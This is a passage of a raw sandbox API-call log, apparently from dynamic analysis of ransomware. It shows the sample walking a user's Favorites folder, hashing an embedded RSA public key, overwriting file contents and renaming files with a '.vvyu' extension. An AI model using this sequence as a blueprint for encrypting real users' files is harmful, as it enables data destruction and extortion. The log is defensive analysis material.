hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0198.449] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ab0 [0198.449] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0198.449] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a70 [0198.449] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b10 [0198.449] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78af0 [0198.449] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b00 [0198.449] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3008 [0198.449] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78af0 | out: hHeap=0x620000) returned 1 [0198.449] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85da8 [0198.449] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b10 | out: hHeap=0x620000) returned 1 [0198.449] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2fd8 [0198.449] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b00 | out: hHeap=0x620000) returned 1 [0198.449] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3068 [0198.449] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0198.449] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a70 [0198.449] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0198.449] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3038 [0198.450] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0198.450] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3020 [0198.450] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0198.450] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3080 [0198.450] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3020 | out: hHeap=0x620000) returned 1 [0198.450] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3020 [0198.450] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3038 | out: hHeap=0x620000) returned 1 [0198.450] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a90 [0198.450] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0198.450] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85d48 [0198.450] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0198.450] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x2e83b60 [0198.450] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2ff0 | out: hHeap=0x620000) returned 1 [0198.450] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2ff0 [0198.450] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0198.450] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x204) returned 0x2d08630 [0198.450] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3050 | out: hHeap=0x620000) returned 1 [0198.450] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c99c10 [0198.450] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3080 | out: hHeap=0x620000) returned 1 [0198.451] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x210) returned 0x2ea6a68 [0198.451] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83b60 | out: hHeap=0x620000) returned 1 [0198.451] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10c) returned 0x2c99d28 [0198.451] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0198.451] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c998c8 [0198.451] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2ff0 | out: hHeap=0x620000) returned 1 [0198.451] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x200) returned 0x2ea6c80 [0198.451] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99c10 | out: hHeap=0x620000) returned 1 [0198.451] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95ea0 [0198.451] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0198.452] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c168 | out: hHeap=0x620000) returned 1 [0198.452] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95fa8 | out: hHeap=0x620000) returned 1 [0198.452] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95ea0 | out: hHeap=0x620000) returned 1 [0198.452] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d48 | out: hHeap=0x620000) returned 1 [0198.453] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c998c8 | out: hHeap=0x620000) returned 1 [0198.453] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0198.453] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6c80 | out: hHeap=0x620000) returned 1 [0198.454] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99d28 | out: hHeap=0x620000) returned 1 [0198.454] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0198.454] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3020 | out: hHeap=0x620000) returned 1 [0198.454] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0198.454] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3068 | out: hHeap=0x620000) returned 1 [0198.454] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85da8 | out: hHeap=0x620000) returned 1 [0198.454] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3008 | out: hHeap=0x620000) returned 1 [0198.454] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2fd8 | out: hHeap=0x620000) returned 1 [0198.454] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e96a80 | out: hHeap=0x620000) returned 1 [0198.455] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd95d8 | out: hHeap=0x620000) returned 1 [0198.455] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95b88 | out: hHeap=0x620000) returned 1 [0198.455] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2fc0 | out: hHeap=0x620000) returned 1 [0198.455] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e94f00 | out: hHeap=0x620000) returned 1 [0198.456] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d08630 | out: hHeap=0x620000) returned 1 [0198.456] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95d98 | out: hHeap=0x620000) returned 1 [0198.456] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaf50 | out: hHeap=0x620000) returned 1 [0198.457] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99af8 | out: hHeap=0x620000) returned 1 [0198.457] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85dc8 | out: hHeap=0x620000) returned 1 [0198.457] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0198.457] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d88 | out: hHeap=0x620000) returned 1 [0198.457] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a670 | out: hHeap=0x620000) returned 1 [0198.458] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e912b0 | out: hHeap=0x620000) returned 1 [0198.458] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0198.458] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0d410 | out: hHeap=0x620000) returned 1 [0198.458] WriteFile (in: hFile=0x568, lpBuffer=0x2e91710*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x312fb14, lpOverlapped=0x0 | out: lpBuffer=0x2e91710*, lpNumberOfBytesWritten=0x312fb14*=0x80, lpOverlapped=0x0) returned 1 [0198.459] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e91710 | out: hHeap=0x620000) returned 1 [0198.459] SetFilePointerEx (in: hFile=0x568, liDistanceToMove=0x85, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0198.459] WriteFile (in: hFile=0x568, lpBuffer=0x2e95c90*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2e95c90*, lpNumberOfBytesWritten=0x312fb50*=0x100, lpOverlapped=0x0) returned 1 [0198.459] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95c90 | out: hHeap=0x620000) returned 1 [0198.459] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0198.460] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x428) returned 0x2ea6a68 [0198.461] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2ea6a68, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0198.461] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x430) returned 0x2ea6e98 [0198.461] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0198.461] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0198.462] WriteFile (in: hFile=0x568, lpBuffer=0x2ea6e98*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ea6e98*, lpNumberOfBytesWritten=0x312fb50*=0x28, lpOverlapped=0x0) returned 1 [0198.462] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6e98 | out: hHeap=0x620000) returned 1 [0198.462] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0198.462] WriteFile (in: hFile=0x568, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x312fb50*=0x26, lpOverlapped=0x0) returned 1 [0198.462] CloseHandle (hObject=0x568) returned 1 [0198.463] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7cf30 [0198.464] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x880) returned 0x2ea6a68 [0198.464] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7cf30 | out: hHeap=0x620000) returned 1 [0198.464] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Favorites\\MSN Websites\\MSN Money.url" (normalized: "c:\\users\\keecfmwgj\\favorites\\msn websites\\msn money.url"), lpNewFileName="C:\\Users\\kEecfMwgj\\Favorites\\MSN Websites\\MSN Money.url.vvyu" (normalized: "c:\\users\\keecfmwgj\\favorites\\msn websites\\msn money.url.vvyu")) returned 1 [0198.465] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0198.465] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0198.466] VirtualFree (lpAddress=0x2900000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0198.468] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e915e0 | out: hHeap=0x620000) returned 1 [0198.468] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x798f9b10, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x798f9b10, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7ee582f0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSN Sports.url", cAlternateFileName="MSNSPO~1.URL")) returned 1 [0198.469] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0198.469] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8e) returned 0x2e915e0 [0198.469] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0198.469] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Favorites\\MSN Websites\\MSN Sports.url") returned=".url" [0198.469] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Favorites\\MSN Websites\\MSN Sports.url" (normalized: "c:\\users\\keecfmwgj\\favorites\\msn websites\\msn sports.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x568 [0198.471] GetFileSizeEx (in: hFile=0x568, lpFileSize=0x312fb40 | out: lpFileSize=0x312fb40*=133) returned 1 [0198.471] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2900000 [0198.474] SetFilePointerEx (in: hFile=0x568, liDistanceToMove=0x5f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0198.474] ReadFile (in: hFile=0x568, lpBuffer=0x2900000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x312fb78, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb78*=0x26, lpOverlapped=0x0) returned 1 [0198.476] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0198.476] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0198.476] SetFilePointer (in: hFile=0x568, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0198.476] ReadFile (in: hFile=0x568, lpBuffer=0x2900000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x312fb70, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb70*=0x85, lpOverlapped=0x0) returned 1 [0198.476] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0198.477] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f1) returned 0x2e912b0 [0198.477] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0198.477] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0198.477] CryptAcquireContextW (in: phProv=0x312fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x312fa50*=0x67c168) returned 1 [0198.478] CryptCreateHash (in: hProv=0x67c168, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x312fa58 | out: phHash=0x312fa58) returned 1 [0198.478] CryptHashData (hHash=0x2cfe140, pbData=0x2e912b0, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0198.478] CryptGetHashParam (in: hHash=0x2cfe140, dwParam=0x2, pbData=0x0, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x312fa54) returned 1 [0198.478] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x2c85dc8 [0198.478] CryptGetHashParam (in: hHash=0x2cfe140, dwParam=0x2, pbData=0x2c85dc8, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x2c85dc8, pdwDataLen=0x312fa54) returned 1 [0198.478] GetLastError () returned 0x0 [0198.478] CryptDestroyHash (hHash=0x2cfe140) returned 1 [0198.478] CryptReleaseContext (hProv=0x67c168, dwFlags=0x0) returned 1 [0198.479] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e912b0 | out: hHeap=0x620000) returned 1 [0198.479] UuidCreate (in: Uuid=0x312fa48 | out: Uuid=0x312fa48) returned 0x0 [0198.479] UuidToStringA (in: Uuid=0x312fa48, StringUuid=0x312fa40 | out: StringUuid=0x312fa40) returned 0x0 [0198.479] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0198.479] RpcStringFreeA (in: String=0x312fa40 | out: String=0x312fa40) returned 0x0 [0198.479] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0198.479] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0198.479] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e91710 [0198.479] SetFilePointer (in: hFile=0x568, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0198.480] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0198.480] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2d0d410 [0198.480] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0198.480] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2e912b0 [0198.480] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a670 [0198.480] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e94f00 [0198.480] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2fc0 [0198.480] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e94eb8 [0198.481] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2fd8 [0198.481] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3008 [0198.481] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3068 [0198.481] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3020 [0198.481] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x2cff270 [0198.481] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x158) returned 0x2e98a80 [0198.481] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x2e98a80, Size=0x218) returned 0x2e9aca8 [0198.481] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x2ea6a68 [0198.481] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3008 | out: hHeap=0x620000) returned 1 [0198.481] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3020 | out: hHeap=0x620000) returned 1 [0198.481] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3068 | out: hHeap=0x620000) returned 1 [0198.481] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cff270 | out: hHeap=0x620000) returned 1 [0198.482] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0198.482] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3068 [0198.482] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ac0 [0198.482] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3020 [0198.482] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85d88 [0198.482] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x2ea3008 [0198.482] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ae0 [0198.482] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x2c99af8 [0198.482] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83b60 [0198.482] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a610 [0198.482] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85dc8 [0198.483] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x2c99d28 [0198.483] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85da8 [0198.483] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a40 [0198.483] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99af8 | out: hHeap=0x620000) returned 1 [0198.483] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3020 | out: hHeap=0x620000) returned 1 [0198.483] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0198.483] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3008 | out: hHeap=0x620000) returned 1 [0198.483] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d88 | out: hHeap=0x620000) returned 1 [0198.483] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0198.483] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3068 | out: hHeap=0x620000) returned 1 [0198.484] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83b60 | out: hHeap=0x620000) returned 1 [0198.484] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a670 | out: hHeap=0x620000) returned 1 [0198.484] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e9aca8 | out: hHeap=0x620000) returned 1 [0198.484] GetCurrentThreadId () returned 0x66c [0198.484] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95c90 [0198.484] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x2ea5c80 [0198.484] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x2cd95d8 [0198.484] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c168 [0198.484] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x2e96a80 [0198.485] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ac0 [0198.485] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ae0 [0198.485] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95d98 [0198.485] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0198.485] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0198.485] GetCurrentThreadId () returned 0x66c [0198.485] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0198.485] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0198.485] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x2e914a8 [0198.485] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0198.486] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0198.486] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0198.486] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0198.486] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e914a8 | out: hHeap=0x620000) returned 1 [0198.486] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95b88 [0198.486] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0198.486] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x2ccaf50 [0198.487] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 